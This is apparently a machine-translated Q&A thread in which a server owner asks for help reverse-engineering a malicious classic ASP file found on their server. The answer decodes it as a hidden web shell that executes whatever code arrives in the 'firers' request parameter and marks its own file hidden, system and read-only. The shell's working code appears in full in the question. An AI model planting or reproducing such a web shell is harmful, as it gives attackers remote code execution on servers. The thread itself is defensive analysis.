VB惡意軟件工具反向工程

Question

我發現我的服務器，它做了一些不好的事情上有趣的惡意軟件。 現在我試圖對其進行逆向工程，但由於完全缺乏VB \ ASP的知識，我需要向您的同事求助。

<% 
Function MorfiCoder(Code) 
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) 
End Function 

Execute MorfiCoder(")/*/srerif/*/(tseuqer lave") 
Set fso=CreateObject("Scripting.FileSystemObject") 
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) 
if f.attributes <> 39 then 
f.attributes = 39 
end if 
%> 

據我瞭解 - 它執行一些命令並創建文件的某個地方與system \ hidden屬性。 主要問題是 - 如何使用它，即從我看到的日誌中，黑客上傳這個文件並使用POST命令。我也希望這個命令能夠理解，他如何能夠將文件上傳到某些文件夾，他應該能夠這樣做。

的任何建議都歡迎。捲曲POST樣本將是驚人的。

Answer 1

無不需要在VB中的知識來研究這些代碼做了什麼;只需閱讀文檔。

MorfiCoder(")/*/srerif/*/(tseuqer lave")返回eval request("firers")（我假設像Replace或StrReverse功能是顯而易見的）。

執行和eval是不言自明;爲request的文檔是here：

Request對象檢索客戶端瀏覽器的HTTP請求中傳遞給服務器的值。

因此，無論是串在firers請求變量，它會被執行（你說你已經知道你的攻擊者使用一個簡單的POST發送數據給他的劇本）。

Set fso=CreateObject("Scripting.FileSystemObject")創建FileSystemObject Object。

Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))creates a File Object;使用PATH_TRANSLATED中的路徑。

那麼一些attributes（Archive，System，Hidden，ReadOnly）是文件對象上設置（隱藏這個腳本）。

爲什麼你的攻擊者能夠到這個文件明明上傳到你的服務器無法通過您所提供的信息來回答，並且也將是出了這個問題的範圍和可能題外話到計算器。